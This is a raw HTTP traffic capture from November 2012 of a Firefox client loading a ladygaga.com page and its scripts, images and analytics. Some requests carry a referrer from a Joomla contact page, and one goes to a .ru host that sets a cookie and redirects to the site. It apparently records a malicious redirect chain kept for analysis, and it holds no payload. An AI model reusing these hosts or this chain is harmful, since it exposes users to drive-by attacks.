Etag: &quot;5ec007-738-4b6eb93146600&quot;
Expires: Tue, 06 Nov 2012 17:03:44 GMT
Last-Modified: Fri, 20 Jan 2012 01:26:48 GMT
Server: Apache/2.2.16 (Amazon)
Via: 1.1 varnish
X-Cached: true
X-Varnish: 812071093 811372782
Content-Length: 1848
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
Content-Length: 471
Last-Modified: Tue, 06 Nov 2012 16:16:17 GMT
Expires: Mon, 12 Nov 2012 16:16:17 GMT
Cache-Control: max-age=518053
Accept-Ranges: bytes
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: close
Content-Length: 471
Last-Modified: Tue, 06 Nov 2012 13:36:12 GMT
Expires: Mon, 12 Nov 2012 13:36:12 GMT
Cache-Control: max-age=508449
Accept-Ranges: bytes
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a20+AM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a20+AM; path=/
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Tue, 06 Nov 2012 16:44:20 GMT
Connection: keep-alive
Content-Length: 471
Last-Modified: Tue, 06 Nov 2012 13:36:23 GMT
Expires: Mon, 12 Nov 2012 13:36:23 GMT
Cache-Control: max-age=508460
Accept-Ranges: bytes
GET /auxiliaryxga.cgi?8 HTTP/1.1

Host: disappointingtheproduct.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Tue, 06 Nov 2012 16:46:39 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Wed, 07-Nov-2012 16:46:39 GMT; path=/; domain=disappointingtheproduct.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a20+AM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:21 GMT
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.026051069557392337 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.026051069557392337 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:20 GMT
EC2-instance-id: i-cb16f5af
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /sso.js HTTP/1.1

Host: sso.universalmusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Accept-Ranges: bytes
Date: Tue, 06 Nov 2012 16:44:20 GMT
EC2-instance-id: i-60b48f05
Etag: W/&quot;16391-1349275618000&quot;
Last-Modified: Wed, 03 Oct 2012 14:46:58 GMT
P3P: CP=&quot;IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT&quot;
Server: Apache-Coyote/1.1
X-SSO-Instance: SSO1-2012.40_RC2
Content-Length: 16391
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.16540084917248254 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.16540084917248254 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:20 GMT
EC2-instance-id: i-df4aeaa4
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /backplane.js HTTP/1.1

Host: d134l0cdryxgwa.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-Modified-Since: Fri, 02 Nov 2012 14:16:18 GMT
If-None-Match: W/&quot;15289-1351865778000&quot;
HTTP/1.0 304 Not Modified

HTTP/1.0 304 Not Modified
Connection: keep-alive
Date: Tue, 06 Nov 2012 16:44:21 GMT
Etag: W/&quot;15289-1351865778000&quot;
Last-Modified: Fri, 02 Nov 2012 14:16:18 GMT
Age: 76529
X-Amz-Cf-Id: vSRSYqOaRLsCtUuxdxG36R9l39qUHB5dXTE4RItaNvEmrXc9ST-9pQ==
Via: 1.0 dc81da318a4ae20e51ccfd9463219596.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /ajax/libs/jquery/1.6.2/jquery.min.js HTTP/1.1

Host: ajax.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 01 Nov 2012 01:09:07 GMT
Expires: Fri, 01 Nov 2013 01:09:07 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32111
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 488114
GET /v1.2/bus/umg/channel/71a7e51a383c21703a91e88436e61b0b?callback=Backplane.response&rnd=0.5172057501729828 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/71a7e51a383c21703a91e88436e61b0b?callback=Backplane.response&amp;rnd=0.5172057501729828 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:20 GMT
EC2-instance-id: i-b716dfca
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.linaconstruction.net/index.php?option=com_aicontactsafe
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a20+AM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:21 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; path=/
GET /v1.2/bus/umg/channel/9e8fe77317ad52cfad5f66aef970fe5c?callback=Backplane.response&rnd=0.8985562425118039 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/9e8fe77317ad52cfad5f66aef970fe5c?callback=Backplane.response&amp;rnd=0.8985562425118039 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:21 GMT
EC2-instance-id: i-b516dfc8
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.7942827557096056 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.7942827557096056 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:21 GMT
EC2-instance-id: i-d92484a2
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/shadowbox.css HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;aafc48b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 923
Vary: Accept-Encoding
Cache-Control: private, max-age=229
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/languages/shadowbox-en.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;18d6cb8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 295
Vary: Accept-Encoding
Cache-Control: private, max-age=207
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/players/shadowbox-iframe.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;e8e8de8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 447
Vary: Accept-Encoding
Cache-Control: private, max-age=150
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/players/shadowbox-img.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;e8e8de8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 990
Vary: Accept-Encoding
Cache-Control: private, max-age=126
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/windows/themes/theme.ashx?s=modal&t=text/css&v=1 HTTP/1.1

Host: www.ladygaga.com
GET /aspnet_client/microgroove/windows/themes/theme.ashx?s=modal&amp;t=text/css&amp;v=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/shadowbox.css
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: text/css
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=2592000
Content-Length: 525
Content-Encoding: gzip
Expires: Thu, 06 Dec 2012 16:44:22 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/adapters/shadowbox-jquery.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;6411c78b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 445
Vary: Accept-Encoding
Cache-Control: private, max-age=397
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /v1.2/bus/umg/channel/9e8fe77317ad52cfad5f66aef970fe5c?callback=Backplane.response&rnd=0.06281253862409764 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/9e8fe77317ad52cfad5f66aef970fe5c?callback=Backplane.response&amp;rnd=0.06281253862409764 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:22 GMT
EC2-instance-id: i-b516dfc8
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /v1.2/bus/umg/channel/ef3ea8615131b4becdaecc1f35fa1870?callback=Backplane.response&rnd=0.4959392427050686 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/ef3ea8615131b4becdaecc1f35fa1870?callback=Backplane.response&amp;rnd=0.4959392427050686 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:22 GMT
EC2-instance-id: i-bf16dfc2
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Tue, 06 Nov 2012 13:09:19 GMT
Expires: Wed, 07 Nov 2012 01:09:19 GMT
Vary: Accept-Encoding
Age: 12903
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352220262799 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352220262799 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Tue, 06 Nov 2012 16:44:22 GMT
Expires: Tue, 13 Nov 2012 16:44:22 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /bornthiswayball/images/logo.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 10 Apr 2012 21:37:54 GMT
Accept-Ranges: bytes
Etag: &quot;0e5cf2f6217cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 75197
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /css/fancybox.css HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Server: Apache
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 209752
Date: Tue, 06 Nov 2012 16:44:23 GMT
Last-Modified: Thu, 05 Apr 2012 07:33:08 GMT
Content-Length: 1585
Connection: keep-alive
GET /libs/v1/jquery-pack.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 11 Oct 2012 16:44:31 GMT
Etag: d74af802a5acfeae38607a8d0b309288
Vary: Accept-Encoding
X-Timestamp: 1349973871.16302
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 11 Oct 2012 16:44:09 GMT
Accept-Ranges: bytes
X-Trans-Id: txb7658eed822e42d9b9a07b9be7e36ac7
Content-Encoding: gzip
Content-Length: 59799
Cache-Control: public, max-age=135
Expires: Tue, 06 Nov 2012 16:46:37 GMT
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /bornthiswayball/images/skype.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 11 Sep 2012 18:52:31 GMT
Accept-Ranges: bytes
Etag: &quot;80c1db984e90cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2741
Date: Tue, 06 Nov 2012 16:44:22 GMT
